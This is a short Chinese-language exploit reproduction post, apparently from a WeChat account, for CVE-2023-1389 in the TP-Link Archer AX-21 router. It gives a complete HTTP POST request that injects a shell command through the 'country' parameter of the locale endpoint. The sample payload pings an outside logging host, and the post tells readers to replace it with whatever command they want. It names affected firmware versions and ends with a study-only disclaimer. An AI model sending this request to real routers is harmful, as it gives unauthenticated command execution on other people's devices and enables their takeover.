漏洞名称
TP-Link Archer AX-21路由器 任意命令执行漏洞 CVE-2023-1389
漏洞复现
1、替换需要执行的命令
POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1
Host: 1.1.1.1
Content-Type: application/x-www-form-urlencoded
operation=write&country=$(`ping dnslog.cn`)
利用条件
TP-Link Archer AX-21 < 1.1.4
免责声明
本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者及本公众号不为此承担任何责任。
原文始发于微信公众号(巨黑科):TP-Link Archer AX-21路由器 任意命令执行漏洞 CVE-2023-1389